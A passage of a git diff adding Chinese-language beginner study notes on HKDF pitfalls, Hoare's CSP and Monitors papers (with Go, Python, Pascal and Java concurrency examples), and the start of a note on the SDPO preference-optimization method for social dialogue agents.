`HKDF-Extract(salt, dh_shared)` | +| 不同用途复用同一 `info` | 密钥相关,可能降格安全性 | 每个用途唯一 `info` 字符串 | +| 用 HKDF 派生「登录密码」密钥 | 无慢哈希,易被字典攻击 | PBKDF2 / Argon2 + 可选 HKDF 二次扩展 | +| `L` 只需 16 字节却省略 `info` | RFC 不推荐;上下文未绑定 | 即使短 key 也走 Expand 并设 `info` | +| salt 由攻击者控制且未认证 | 可能削弱 Extract | salt 来自协议已认证字段或本地随机 | + +## 安全属性(直觉) + +在 HMAC 建模为 PRF 的前提下,HKDF 保证: + +1. **伪随机性**:OKM 在计算上不可与均匀随机区分(给定 IKM/salt/info 的适当独立性假设) +2. **上下文分离**:同一 IKM、不同 `info` → 不同 OKM,且已知其一难以推另一 +3. **保守哈希使用**:只依赖 HMAC 而非裸 Hash 拼接,减轻哈希函数结构攻击面 + +完整证明见 Krawczyk, *Cryptographic Extraction and Key Derivation: The HKDF Scheme*(CRYPTO 2010)。RFC 5869 是工程可落地的规范化描述。 + +## 与其他规范的交叉引用 + +- [[tls-1-3-rfc8446]] — HKDF 最大规模部署场景 +- [[noise-protocol-framework]] — 握手链密钥与 HKDF 同构 +- [[signal-double-ratchet-2016]] — 棘轮链密钥派生 +- [[hmac-rfc2104]] — HKDF 的底层原语(若笔记存在) +- [[wireguard-2017]] — HKDF-BLAKE2s 变体 + +## 小结 + +| 概念 | 一句话 | +|------|--------| +| Extract | `PRK = HMAC(salt, IKM)`,把不均匀 IKM 压成固定长度伪随机密钥 | +| Expand | 计数器链式 HMAC,按 `info` 标签输出任意长度 OKM(≤ 255×HashLen) | +| salt | 非秘密但宜随机;加强 Extract,防跨源混淆 | +| info | 用途绑定;防「同一原料调出同一口味」 | +| 典型用户 | TLS 1.3、Noise、Signal、IKEv2、Web Crypto | + +**零基础记忆口诀**:先**榨**(Extract)成基底,再按**标签**(info)**兑**(Expand)多杯密钥;DH 果汁必须先榨,密码原料别只用 HKDF。 diff --git a/src/content/docs/papers/hoare-csp-1978.md b/src/content/docs/papers/hoare-csp-1978.md new file mode 100644 index 000000000..f5e24db4d --- /dev/null +++ b/src/content/docs/papers/hoare-csp-1978.md @@ -0,0 +1,286 @@ +--- +title: Communicating Sequential Processes — Hoare 1978 零基础学习笔记 +来源: https://www.cs.cmu.edu/~crary/819-f09/Hoare78.pdf +日期: 2026-06-13 +子分类: 类型与 PL 理论 +分类: 编程语言 +provenance: pipeline-v3 +--- + +## 日常类比:接力赛里的传棒,不是抢同一块白板 + +想象一场 **4×100 米接力**。每位选手有自己的跑道和号码布(**局部状态**),**不能**跑到隔壁赛道改别人的成绩。要把接力棒交给下一位,必须 **两人同时伸手在交接区会合**——你举着棒等,对方也得伸手接;任何一方没到,另一方就 **一直等**。棒不会 magically 出现在终点:没有「共享内存里的缓冲区」自动帮你存着。 + +C. A. R. Hoare 在 1978 年发表于 *Communications of the ACM* 的 [Communicating Sequential Processes](https://www.cs.cmu.edu/~crary/819-f09/Hoare78.pdf)(Vol. 21 No. 8,pp. 666–677,DOI [10.1145/359576.359585](https://dl.acm.org/doi/10.1145/359576.359585))主张:并发程序也该这样组织—— + +- **进程(process)** 是只会顺序执行自己指令的「选手」; +- **输入 `?` 与输出 `!`** 是像传棒一样的基本原语; +- **`||` 并行组合** 让多个选手同时跑,但数据只通过 **点名 channel 会合** 流动。 + +论文把 Dijkstra 的 **守卫命令(guarded command)** 搬进来:`*[ 条件 → 动作 ]` 表示循环,多路 `[]` 表示 **谁先满足条件就先执行谁**——天然支持 **非确定性选择**。于是 coroutine、信号量、monitor、有界缓冲区、甚至筛法求素数,都能用 **极小的语法** 拼出来,而不必先发明锁和条件变量。 + +一句话:**别抢共享白板;约好名字,在传棒区会合。** + +## 这篇论文在说什么 + +| 维度 | 内容 | +|------|------| +| 作者 | **C. A. R. Hoare**(Queen's University of Belfast) | +| 发表 | CACM,**1978 年 8 月** | +| 页数 | 约 11 页 | +| 关键词 | 并行编程、输入输出、守卫命令、非确定性、coroutine、monitor、条件临界区 | +| CR 分类 | 4.20, 4.22, 4.32 | +| 直接后继 | occam、Ada task、Erlang、**Go**(channel + `select`)、Rust channel、CSP 代数(Brookes–Hoare–Roscoe 1984) | + +论文的 **激进主张** 有三条: + +1. **I/O 应与赋值、分支同级**,是语言内置原语,而不是 `read()`/`write()` 库函数事后补丁。 +2. **并行组合** `||` 应和顺序组合一样基础,用来 **结构化** 并发,而不是 `fork` + 共享变量 + `pthread_mutex` 大杂烩。 +3. **同步通信(rendezvous)** 默认 **无缓冲**:发送与接收必须 **同时就绪** 才完成一次传递;延迟对进程 **不可见**(像阻塞在 I/O 上一样自然)。 + +1978 版 CSP 是 **静态** 语言:进程个数在源码里固定,**没有** 进程值变量和递归进程(后来 1984 理论论文才系统处理递归与失败语义)。但正因为限制多,论文里的例子 **特别干净**,适合零基础建立并发直觉。 + +## 核心概念 + +### 1. 进程与并行组合 `||` + +一个 CSP 程序由若干 **顺序进程** 组成。语法上,方括号里的进程 **同时开始、并行执行**: + +``` +[ P || Q || R ] +``` + +- 每个进程有 **自己的局部变量**,互不可见。 +- 并行命令 **成功结束** 当且仅当 **所有** 子进程都结束。 +- 语言 **不规定** 各进程相对速度——调度是 **抽象** 的,只保证通信语义。 + +日常类比:三位选手同时起跑,各自跑自己的圈;全队成绩要等 **最慢的那位** 冲线。 + +### 2. 输入 `?` 与输出 `!`(会合通信) + +若进程 `COPY` 要从 `SOURCE` 读、向 `SINK` 写,论文写法类似: + +``` +COPY :: + [ SOURCE?x → SINK!x ] +``` + +读作:`SOURCE` **输出** 一个值时,`COPY` **输入** 到 `x`,再 **输出** 给 `SINK`。关键规则(论文第 2 节): + +| 规则 | 含义 | +|------|------| +| **双向阻塞** | `A!v` 要等 `B?x`(且 `A` 指 `B`、`B` 指 `A`)配对才完成 | +| **无自动缓冲** | 没有隐式队列;慢的一方会让快的一方 **等着** | +| **延迟不可见** | 被阻塞的进程感觉不到「等了多久」,只感觉像一次普通 I/O | +| **按名连接** | 谁和谁通信由 **进程名** 写死在协议里 | + +这就是 **rendezvous(会合)**:传棒区里 **双方同时伸手** 才算一次成功传递。 + +### 3. 守卫命令与重复构造 + +Dijkstra 的守卫命令在 CSP 里承担 **条件、循环、非确定性**: + +``` +< 重复命令 > ::= * [ < 守卫> → < 命令> { [] < 守卫> → < 命令> } ] +< 选择命令 > ::= [ < 守卫> → < 命令> { [] < 守卫> → < 命令> } ] +``` + +- `G → S`:仅当守卫 `G` 为真才执行 `S`。 +- 多个分支用 `[]` 分隔;若 **多个守卫同时为真**,选哪一个 **未规定**(**非确定性**)——实现可以公平,但 **语义不保证**。 +- `*[ ... ]`:重复执行,直到 **所有** 守卫都为假(或输入源终止,见下)。 + +### 4. 输入守卫(input guard) + +CSP 的创新之一:**channel 上有没有人送数据** 本身可以当守卫: + +``` +[ producer?x → 处理 x +[] consumer!y → 送出 y ] +``` + +- 仅当 `producer` **已准备好** 对应 `output` 时,第一条可选; +- 若 **多条输入守卫** 同时就绪,**任选一条**(又是非确定性); +- 在 `*[ ... ]` 里,若某输入守卫的 **源进程已终止**,该守卫永久为假;**所有** 输入守卫的源都终止时,整个重复命令 **结束**。 + +这让 **有界缓冲区、服务器、多路复用** 不需要显式 `mutex`:「等生产者」和「等消费者」是 **两条守卫**,谁先来服务谁。 + +### 5. 与共享内存模型的对比 + +| 维度 | 共享内存 + 锁 | CSP(1978) | +|------|----------------|-------------| +| 数据交换 | 读写同一地址 | 仅 `!` / `?` | +| 同步 | 锁、条件变量、信号量 | 会合本身即同步 | +| 典型 bug | 数据竞争、死锁、忘记解锁 | 协议死锁(环形等待 channel) | +| 组合方式 | 线程 + 全局堆 | 进程网络 + 命名 channel | + +Hoare 并非否认 monitor(他自己 1974 年刚发表过 [Monitors](/papers/hoare-monitors-1974)),而是证明:**用通信 + 守卫就能表达 monitor 能表达的一大类结构**,且推理时 **不必追踪整个堆上的别名**。 + +### 6. 静态进程网络 + +1978 论文里的程序 **进程名与拓扑在编译期固定**。好处: + +- 易于在 **单机上用调度器模拟**,也可映射到 **多处理器 + 物理链路**; +- 便于 **人工验证** 协议(后来发展成 CSP 代数与 model checker FDR)。 + +代价:不能 `spawn` 任意多个 worker——那是后来 **π-演算(Milner)** 和 **带递归的 CSP** 要解决的问题。 + +## 代码示例 + +### 示例 1:COPY — 论文中最小的管道 + +**CSP 伪代码**(对应论文 copy process): + +``` +COPY :: + *[ SOURCE?x → SINK!x ] +``` + +**Go 等价实现**(channel 即命名会合点): + +```go +package main + +import "fmt" + +func copyProcess(source <-chan int, sink chan<- int) { + for x := range source { // 等价于 * [ source?x → ... ] + sink <- x // sink!x;无缓冲时与对端同时就绪才完成 + } +} + +func main() { + source := make(chan int) // 无缓冲 channel ≈ CSP 会合 + sink := make(chan int) + go func() { + for _, v := range []int{1, 2, 3} { + source <- v + } + close(source) + }() + go copyProcess(source, sink) + for v := range sink { + fmt.Println(v) + } +} +``` + +要点:`source <- v` 与 `x := range source` 构成 **双向阻塞**;`copyProcess` 里没有锁,只有 **「有输入才转发」** 的协议。 + +### 示例 2:有界缓冲区 — 用输入守卫代替条件变量 + +论文用 **一个进程** 持环形缓冲,两个守卫分别服务生产者与消费者(容量 `N`): + +``` +BUFFER :: + [ buf: (0..N-1) integer; in, out: integer; + in := 0; out := 0; + *[ in < out + N; producer?buf[in mod N] → in := in + 1 + [] out < in; consumer!buf[out mod N] → out := out + 1 + ] + ] +``` + +**Python + 伪同步**(用 `queue.Queue(maxsize=N)` 展示 **背压**:满则生产者阻塞,空则消费者阻塞——语义上接近 CSP 无缓冲会合链,只是标准库在底层用了锁): + +```python +from queue import Queue +from threading import Thread + +def producer(q: Queue, items): + for x in items: + q.put(x) # 队列满时阻塞 ≈ consumer 未就绪,producer! 无法完成 + +def consumer(q: Queue): + while True: + x = q.get() # 队列空时阻塞 ≈ producer 未就绪 + print("got", x) + q.task_done() + +def main(): + q = Queue(maxsize=3) # N = 3 + Thread(target=producer, args=(q, range(10))).start() + Thread(target=consumer, args=(q,)).start() + +if __name__ == "__main__": + main() +``` + +CSP 版本 **没有** `Queue` 对象在进程外:缓冲索引 `in`/`out` 是 **BUFFER 进程的内部变量**,生产者、消费者是 **别的进程**,只通过 `producer?` / `consumer!` 与 BUFFER **会合**。对比可见:CSP 把「队列 + 两个条件变量」压成 **一个事件循环 + 两个输入守卫**。 + +### 示例 3:守卫选择 — 多路 `select` + +论文语法: + +``` +[ clock?tick → 处理超时 +[] worker?job → 处理任务 +] +``` + +**Go 的 `select`** 几乎一一对应(且常用来避免 goroutine 泄漏): + +```go +select { +case <-clock: + handleTimeout() +case job := <-worker: + handleJob(job) +} +``` + +若 `clock` 与 `worker` **同时就绪**,Go **伪随机** 选一个——与 CSP **非确定性** 语义一致:你不能假设公平性,除非自己写额外协议。 + +## 论文中的经典构造(读懂目录就懂一半历史) + +| 构造 | CSP 思路 | 你或许见过 | +|------|----------|------------| +| **Coroutine** | 两个进程互相 `?`/`!` 交替 | Python `yield` 协作(概念相近) | +| **Subroutine** | 调用方 `!` 参数、被调方 `?` 后再 `!` 结果 | 远程过程调用的极简版 | +| **Bounded buffer** | 单进程 + 双输入守卫 | Java `BlockingQueue` | +| **Monitor** | 入口进程 + 内部状态进程 | Java `synchronized` | +| **Sieve of Eratosthenes** | 筛子链:每个素数一个进程,倍数过滤 | Go 并发教程常举 | +| **Conditional critical region** | 用守卫表达「仅当条件成立才进临界区」 | 后来较少直接用,思想进了 monitor | + +**筛法** 特别能体现 CSP 风味:每个筛子进程从左边读整数,若通过素数测试就 **向右传递**,否则丢弃;新素数 **spawn 新筛子** 在 1978 静态语法里要预先展开,但 **管道拓扑** 的思想影响深远。 + +## 实现与语义上要注意的坑 + +1. **死锁**:进程环 `A! → B? → B! → C? → C! → A?` 若缓冲为零且顺序不对,全体永久阻塞——与死锁四条件类似,但 **只从 channel 协议** 就能分析。 +2. **非确定性**:多个就绪守卫时 **不要写依赖调度顺序** 的正确性;需要确定性时加 **额外握手或优先级协议**。 +3. **无缓冲的代价**:每次传递都同步,吞吐可能低;工程上常加 **有界缓冲 channel**(Go 带容量 channel、Erlang mailbox 上限)——那是 **实现优化**,1978 语义层仍用会合理解。 +4. **与 π-演算的区别**:CSP 早期 **channel 名静态**;π 演算允许 **传递 channel 名本身**,适合移动进程与动态拓扑。 +5. **与 Actor 的区别**:Actor 典型是 **异步邮箱**(发完就走);CSP 默认 **同步会合**(发者等收者)。语义和可推理性都不同。 + +## 历史影响(为什么 1978 仍值得读) + +- **Go**(Rob Pike 等)把 slogan 写在官网上:*Don't communicate by sharing memory; share memory by communicating*——几乎是这篇论文的脚注。 +- **occam**(INMOS Transputer)把 CSP 做成 **可运行语言**,`PAR`/`ALT` 关键字影响一代嵌入式并发。 +- **Ada task** 的 rendezvous 直接标注受 CSP 启发。 +- **Erlang**「进程 + 消息」与 CSP **精神亲缘**(虽异步为主)。 +- **CSP/FDR、Promela/SPIN** 等验证工具,把 **进程代数** 用于工业级协议检查。 +- **C.A.R. Hoare** 本人因程序设计语言与形式方法的工作获 **1980 年图灵奖**;CSP 是其中 **最常被引用的并发模型之一**。 + +若你只读过共享内存多线程,读 1978 CSP 会像 **换了一副眼镜**:并发不再是「防止别人踩我的变量」,而是 **设计传棒协议**。 + +## 延伸阅读 + +| 资源 | 说明 | +|------|------| +| [Hoare 1978 PDF](https://www.cs.cmu.edu/~crary/819-f09/Hoare78.pdf) | 原文,含完整语法与习题解答 | +| [Brookes, Hoare, Roscoe 1984 — A Theory of CSP](https://dl.acm.org/doi/10.1145/828.833) | 失败集合、递归、隐藏运算符的数学基础 | +| [PRG-14 CSP 教程 (Oxford)](https://www.cs.ox.ac.uk/files/3236/PRG14.pdf) | 逐章对照 Algol 60 的入门讲义 | +| 本库 [CSP 速记](/papers/csp-hoare-1978) | 更短的姊妹篇 | +| 本库 [Monitors Hoare 1974](/papers/hoare-monitors-1974) | 共享内存路线对照 | +| [The Go Programming Language — Concurrency](https://go.dev/blog/codelab-share) | 现代 channel 实践 | + +## 自测题 + +1. 为什么 CSP 说 **无自动缓冲**?若强行加无限缓冲,会合语义会丢什么? +2. 写出两条输入守卫同时就绪时,CSP 允许实现做什么?对程序员意味着什么? +3. 用 `?`/`!` 描述「函数调用」:调用方如何传参、如何拿回返回值? +4. Go 带缓冲 `make(chan int, 10)` 与 1978 CSP 的差别在哪里?仍能用会合直觉理解吗? +5. 有界缓冲区 CSP 版为何不需要 `wait`/`signal`? + +--- + +*学习路径建议:先读本文建立传棒直觉 → 读原文 Section 3–5 看语法 → 用 Go channel 写 COPY 与 worker pool → 再读 1984 理论论文理解 failures/divergence。* diff --git a/src/content/docs/papers/hoare-monitors-1974.md b/src/content/docs/papers/hoare-monitors-1974.md new file mode 100644 index 000000000..9955d0520 --- /dev/null +++ b/src/content/docs/papers/hoare-monitors-1974.md @@ -0,0 +1,270 @@ +--- +title: Monitors — Hoare 1974 操作系统结构化概念(零基础学习笔记) +来源: https://en.wikipedia.org/wiki/Monitor_(synchronization) +日期: 2026-06-13 +分类: 操作系统 +子分类: 内核与虚拟化 +provenance: pipeline-v3 +--- + +## 日常类比:银行 VIP 室,不是抢号机 + +想象一家银行里有一间 **VIP 洽谈室**(monitor),里面放着一本 **共享账本**(monitor 的局部数据)和一位 **客户经理**(monitor 里的过程/方法)。 + +规则很简单: + +1. **同一时间只允许一位客户进门办事**——这就是 **互斥(mutual exclusion)**。 +2. 客户进门后可以说:「我要换 100 美元,但金库暂时没现钞。」客户经理不会让客户在柜台前干瞪眼占着位子(那叫 **忙等 / spin-wait**,浪费大家时间),而是让客户 **到等候区坐下**(`wait`),并 **把 VIP 室钥匙让出来**,让下一位客户进来 **释放资源或改变状态**。 +3. 当金库补好了,正在办事的客户或经理喊一声:「现钞有了!」(`signal`),等候区里 **恰好一位** 客户被叫回洽谈室继续办业务。 + +Hoare 在 1974 年发表的 [Monitors: An Operating System Structuring Concept](https://dl.acm.org/doi/10.1145/355620.361161)(*Communications of the ACM*,Vol. 17 No. 10,pp. 549–557)要做的,就是把这种「**数据 + 操作 + 互斥 + 有条件地睡觉与叫醒**」打包成操作系统里 **结构化并发** 的基本模块。论文在 Per Brinch Hansen 提出 monitor 雏形的基础上,形式化了 **条件变量(condition variable)** 上的 `wait` / `signal`,给出了 **基于信号量的实现思路** 和 **霍尔式证明规则**,并用有界缓冲区、闹钟、磁盘调度、读者写者等经典问题示范。 + +一句话:**monitor 不是又一种锁,而是「把共享状态和它该遵守的规则锁在同一个房间里」的架构手法。** + +## 这篇论文在说什么 + +| 维度 | 内容 | +|------|------| +| 作者 | **C. A. R. Hoare**(当时 Queen's University of Belfast) | +| 发表 | CACM,**1974 年 10 月** | +| DOI | [10.1145/355620.361161](https://dl.acm.org/doi/10.1145/355620.361161) | +| 前驱 | Brinch Hansen 的 monitor 与 **Concurrent Pascal** | +| 后继影响 | Modula、C# `lock`、Java `synchronized` + `wait`/`notify`、POSIX `pthread_mutex` + `pthread_cond` | +| CR 分类 | 4.31, 4.22(操作系统、并发) | + +论文要解决的核心痛点:早期多道程序用 **临界区散落各处**(Dijkstra 的 critical region 思想)或裸 **信号量**,程序员容易写出 **时间依赖 bug**——代码「偶尔能跑」取决于调度顺序。Hoare 主张:**把「保护谁」和「在什么条件下等待」写进一个文本上相邻的模块**,让不变量(invariant)可见、可证。 + +## 核心概念 + +### 1. Monitor 的组成 + +一个 monitor 包含: + +| 部分 | 作用 | +|------|------| +| **局部变量** | 描述资源状态(如「空闲缓冲区个数」「磁盘头方向」) | +| **过程(entries)** | 外界唯一能合法改动这些变量的入口 | +| **互斥** | 任意时刻 **最多一个** 线程在执行 monitor 内代码 | +| **条件变量** | 多种「等不及了」的原因分开排队 | + +调用 monitor 过程 ≈ 先拿锁进门,办完出门放锁。过程 **不应读写 monitor 外的全局变量**(否则又回到时间依赖泥潭)。 + +### 2. 不变量 I(monitor invariant) + +程序员为 monitor 关联断言 **I**:当 **没有线程在 monitor 内执行** 时,I 必须为真。 + +例如有界缓冲区 monitor 里,若 `count` 是当前元素个数、`N` 是容量,则: + +\[ +0 \le count \le N +\] + +每次 `wait` 或 `signal` **之前**,当前线程必须重新建立 I;`wait` 会暂时离开 monitor,因此 **离开前 I 必须成立**,否则别的线程进门看到烂状态。 + +### 3. wait 与 signal(Hoare 语义) + +对条件变量 `b`,程序员关联断言 **B**(「我等的就是 B 为真」)。 + +**wait(b)**(在 monitor 过程内调用): + +1. 断言 **I ∧ B** 已成立; +2. 调用者 **阻塞** 并进入 `b` 的等待队列; +3. **释放 monitor 互斥**,让其他线程能 `signal` 或调用别的过程。 + +**signal(b)**: + +1. 调用前须保证 **I ∧ B**(你要叫醒的人等的就是 B); +2. 若 `b` 上有人等,**立刻** 唤醒其中一个(Hoare 原论文:**被唤醒者优先**,signal 方暂停,把 monitor 占有权交给被唤醒者); +3. 若无人等,`signal` **空操作**。 + +这与后来 Mesa/Java 常用的语义不同:Mesa 里 `signal` 后 **唤醒者只是「有资格竞争锁」**,醒来后要 **while 重查条件**(spurious wakeup)。学 Hoare 论文时务必分清 **Hoare semantics vs Mesa semantics**。 + +### 4. 霍尔证明规则(论文亮点) + +论文给出对称的公理化规则,便于用 **谓词演算** 推理 monitor 正确性: + +| 操作 | 前置条件 | 后置条件 | +|------|----------|----------| +| `b.wait` | **I ∧ B** | (线程离开 monitor,I 已恢复) | +| `b.signal` | **I ∧ B** | **I**(B 可能被唤醒者改假,故只保留 I) | + +记忆口诀:**wait 带着「不变量 + 我等什么」进去睡;signal 带着「不变量 + 条件已真」去叫人,叫完只敢保证不变量还在。** + +### 5. 优先级 wait(scheduled wait) + +FCFS 不够用时(如 **闹钟**:谁该先响取决于「期望唤醒时刻」),Hoare 引入带优先级参数的 wait,例如 `busy.wait(p)`:`signal` 时唤醒 **p 最小** 的等待者。论文用 **alarm clock monitor** 示范——操作系统里「到点叫醒进程」的雏形。 + +### 6. 与信号量的关系 + +论文说明 monitor **可用二元信号量实现**,与 P/V 操作 **表达能力等价**;但 monitor 在 **源码结构** 上更利于人类推理和操作系统分层(每个资源一类 monitor:缓冲区、磁盘、打印机…)。 + +```mermaid +flowchart TB + subgraph Monitor["Monitor(VIP 洽谈室)"] + Data["局部数据 + 不变量 I"] + end + P1["线程调用 entry"] --> Mutex["获取互斥"] + Mutex --> Data + Data --> Cond{"条件 B 满足?"} + Cond -->|否| Wait["wait(b):释放互斥并睡眠"] + Wait --> Queue["条件 b 等待队列"] + Signal["其他线程 signal(b)"] --> Queue + Queue --> Resume["被唤醒,重新占有 monitor"] + Cond -->|是| Work["执行临界操作"] + Resume --> Work + Work --> Exit["释放互斥,离开 monitor"] +``` + +## 代码示例 1:单资源调度(acquire / release) + +最简单的 monitor 像 **二元信号量**:资源空闲与否用布尔变量 `busy` 表示。 + +```pascal +monitor ResourceScheduler; + var busy: boolean; + + procedure acquire; + begin + if busy then + wait(busy); { 等「资源空闲」条件;论文里条件名与断言关联 } + busy := true; + end; + + procedure release; + begin + busy := false; + signal(busy); { 叫醒一位等资源的线程 } + end; + +begin { monitor 初始化 } + busy := false; +end; +``` + +使用前:`busy = false` ⇒ **I** 成立(资源可用状态一致)。`acquire` 在 `busy` 为真时 wait;`release` 置 `busy := false` 并 signal。注意:**if busy then wait** 在 Hoare 论文风格里常见;现代写法更倾向 **`while not B do wait(b)`**(Mesa),防止虚假唤醒。 + +## 代码示例 2:有界缓冲区(生产者—消费者) + +论文用 **bounded buffer** 展示 **多个条件变量** 共用一个 monitor:生产者等「非满」,消费者等「非空」。 + +```pascal +monitor BoundedBuffer; + const N = 10; + var buffer: array[1..N] of Item; + count, in, out: integer; + notFull, notEmpty: condition; + + procedure put(x: Item); + begin + if count = N then + wait(notFull); { B: count < N } + buffer[in] := x; + in := in mod N + 1; + count := count + 1; + signal(notEmpty); { 可能唤醒等数据的消费者 } + end; + + procedure get(var x: Item); + begin + if count = 0 then + wait(notEmpty); { B: count > 0 } + x := buffer[out]; + out := out mod N + 1; + count := count - 1; + signal(notFull); { 可能唤醒等空位的生产者 } + end; + +begin + count := 0; in := 1; out := 1; +end; +``` + +**不变量 I**:`0 ≤ count ≤ N`,且 `in`、`out` 在环形数组语义下一致。`put` 在满时等 `notFull`;`get` 在空时等 `notEmpty`——**两种「睡不着」的原因分开排队**,比用一个条件变量 + 复杂判断清晰得多。 + +## 代码示例 3:Java 里的 monitor 后裔(对比阅读) + +Java 每个对象自带一把锁;`synchronized` 方法 ≈ monitor entry,`wait`/`notify` ≈ 条件变量(实际是 **Mesa 语义**): + +```java +class BoundedBuffer { + private final Object[] buf = new Object[10]; + private int count, in, out; + + public synchronized void put(Object x) throws InterruptedException { + while (count == buf.length) // Mesa:必须用 while 重查 + wait(); + buf[in] = x; + in = (in + 1) % buf.length; + count++; + notifyAll(); // 唤醒可能等在 notEmpty 上的消费者 + } + + public synchronized Object get() throws InterruptedException { + while (count == 0) + wait(); + Object x = buf[out]; + out = (out + 1) % buf.length; + count--; + notifyAll(); + return x; + } +} +``` + +`wait()` 释放 **this** 上的监视器锁;`notify` 不保证立即把 CPU 交给被唤醒线程——这是学 Hoare 1974 后读 Java 源码时最常踩的 **语义落差**。 + +## 论文中的其他示范(知道名字即可) + +| 例子 | 说明 | +|------|------| +| **Alarm clock** | 按唤醒时间优先级排队;tick 过程周期性 signal | +| **Buffer pool** | 比简单有界缓冲更复杂的消息块分配 | +| **Disk head optimizer** | 减少磁头换向;展示 monitor 组织 I/O 策略 | +| **Readers / writers** | 「公平」读者写者版本;说明 monitor 也能表达复杂调度策略 | + +这些例子共同说明:Hoare 关心的不只是「互斥」,而是 **把操作系统里一类资源的策略封装成可验证模块**。 + +## 常见误区 + +| 误区 | 正解 | +|------|------| +| 「有 `mutex` 就够了」 | 还需要 **条件变量** 表达「等某个谓词为真」,否则只能忙等或复杂轮询 | +| `signal` 之后条件一定仍真 | 被唤醒者往往要 **重新检查 B**;signal 方只保证调用瞬间 **I ∧ B** | +| monitor 自动防死锁 | **不防**。多 monitor、锁顺序错误仍会死锁;论文明确这是程序员责任 | +| Hoare 与 Mesa 一样 | Java/pthread 多为 Mesa;教材画 Hoare 优先唤醒图时要分清 | +| monitor 已过时 | 思想活在 **Rust `Mutex` + `Condvar`**、`std::sync`、Go 里 channel 背后的设计讨论中 | + +## 与前后文献的关系 + +```text +Dijkstra (1965) 信号量 + ↓ +Brinch Hansen (1970s) monitor 雏形 + Concurrent Pascal + ↓ +Hoare (1974) 本文 — 条件变量、证明规则、OS 结构化 + ↓ +Mesa/Cedar (1980) signal 语义调整 → 影响 Java + ↓ +现代:pthread、C++、Rust、C# lock + Monitor 类 +``` + +同一时期的 **Lamport (1974)** 面包店算法、**Coffman (1971)** 死锁条件等,与 monitor 一起构成操作系统并发课的「经典三角」。 + +## 读懂论文的抓手 + +1. **先画不变量 I**:monitor 外(无人 inside)什么必须为真? +2. **每个条件变量写清 B**:`notFull` ⇔ `count < N`,`notEmpty` ⇔ `count > 0`。 +3. **标出 wait 前是否已建立 I∧B**;signal 前是否已让 B 对等待者成立。 +4. **问自己用的是 Hoare 还是 Mesa**:实现不同,伪代码里的 `if` vs `while` 就不同。 + +## 延伸阅读 + +- 原文 PDF:[Hoare, CACM 1974](https://dl.acm.org/doi/10.1145/355620.361161)(机构订阅);技术报告 [Stanford CS-TR-73-401](http://i.stanford.edu/pub/cstr/reports/cs/tr/73/401/CS-TR-73-401.pdf) +- 概念综述:[Wikipedia — Monitor (synchronization)](https://en.wikipedia.org/wiki/Monitor_(synchronization)) +- Brinch Hansen, *The Architecture of Concurrent Programs* (1977) — monitor 在语言里的落地 +- Hoare, *Communicating Sequential Processes* (CSP, 1978) — 另一条并发哲学路线 +- Andrews & Schneider, *Concepts and Notations for Concurrent Programming* (1983) — 统一 monitor / message / remote procedure 术语 + +## 小结 + +Hoare 1974 把 **「共享数据 + 互斥入口 + 条件等待」** 从操作系统黑客经验提炼成 **可证明的结构化原语**。你不必手写 Pascal monitor 才能在工程里受益:理解 **不变量、条件变量、wait/signal 契约**,就能读懂今天代码里的 `synchronized`、`pthread_cond_wait`、以及为什么 **「先改状态再 signal」** 几乎是并发模块的默认纪律。这篇论文的价值,在于它教会我们 **把并发控制当成模块设计问题,而不是到处打补丁的锁补丁。** diff --git a/src/content/docs/papers/hopper-dpo.md b/src/content/docs/papers/hopper-dpo.md new file mode 100644 index 000000000..a0b196618 --- /dev/null +++ b/src/content/docs/papers/hopper-dpo.md @@ -0,0 +1,222 @@ +--- +title: "SDPO: Segment-Level Direct Preference Optimization for Social Agents" +来源: https://arxiv.org/abs/2501.01821 +日期: 2026-06-13 +分类: 其他 +子分类: 对齐 +provenance: pipeline-v3 +--- + +# SDPO 零基础学习笔记 + +## 一句话概括 + +SDPO 是一种训练 AI 社交代理的新方法,让它像人类一样在**多轮对话中做出更好的社交决策**——比如谈判、合作、竞争。它找出了对话中"犯错的片段",用正面对照来修正模型。 + +## 日常类比:学车教练 + +想象你在学开车。教练坐在副驾驶观察你的每一脚油门、每一次打方向盘。 + +- **Turn-level DPO(逐轮)**:教练只盯着你压到路边石的那一次打方向,然后说"那次打错了"。但开车是一连串操作,只纠正一次打方向,你下次可能还是不会。 +- **Session-level DPO(整场)**:教练看完你一整场练习,说"你整场开得不好",然后从头让你重来一整遍。问题是,可能中间有七八次操作是对的,教练全当成"错"的来处理了——这就是**噪声**。 +- **SDPO(片段级)**:教练找到你第一次失误的那个片段(比如"倒车入库"这段连续的三四个操作),再让你看一遍"正确做法是怎么倒的"。只对比这两个片段。不多不少,刚刚好。 + +SDPO 的核心思想就是"精准定位错误片段,只做片段级的对比学习"。 + +## 背景知识:为什么需要 DPO? + +先理解 DPO(Direct Preference Optimization)。它是从 RLHF(Reinforcement Learning from Human Feedback)简化来的。 + +> RLHF 需要训练一个"奖励模型",再拿强化学习去优化——步骤繁琐、训练不稳定。 +> DPO 发现:其实可以直接从"偏好数据"(人类更喜欢 A 回复还是 B 回复)训练模型,不需要显式训练奖励模型。 + +标准 DPO 处理的是**单次回复**——你问我"今天天气怎样",模型生成两个不同的回答,DPO 让它更喜欢更好的那个。 + +但社交对话不一样。你在跟人谈判"借一笔钱",第一句说"你好"、第二句说"我最近遇到点困难"、第三句说"能不能借我五百块"——这三句话是一个整体。单看哪一句都无所谓好坏,**合在一起**才能判断是成功还是失败。这就是标准 DPO 不够用的原因。 + +## 三种粒度对比 + +| 方法 | 粒度 | 优点 | 缺点 | +|------|------|------|------| +| DPO(turn-level) | 单轮对话 | 简单直接 | 看不到全局,孤立地看每一轮 | +| ETO / DMPO(session-level) | 整场对话 | 全局视角 | 包含大量"对的轮次"也被当作噪声 | +| **SDPO(segment-level)** | **关键片段** | 精准、灵活 | 需要找到正确的片段 | + +**关键洞察**:DPO 是 SDPO 的特例(片段长度=1),ETO 也是 SDPO 的特例(片段长度=整场对话)。SDPO 是**通用框架**。 + +## SDPO 怎么工作?三步走 + +### 第一步:行为克隆(Behavioral Cloning) + +先用 GPT-4-turbo 在 SOTOPIA 模拟环境中自动生成"专家级对话"(让两个 GPT 互相聊),然后用这些数据微调一个开源模型(如 Llama-3.1-8B)。这个微调后的模型就是初始社交代理。 + +### 第二步:构建偏好数据 + +这是 SDPO 最核心的部分,分三个子步骤: + +**1. 错误定位(Error Location)** +- 对每一场得分低的对话(goal 维度 < 7),用 GPT-4o 找出"是哪一轮导致失败的" +- 判断标准:这一轮是关键决策,但仍然可以做得更好 + +**2. 正面对话采样(Positive Session Sampling)** +- 从出错的那一轮**之前**的对话历史出发,让模型重新生成 5 次完整对话 +- 选出得分最高的那一场作为"正面对照" + +**3. 片段选择(Segment 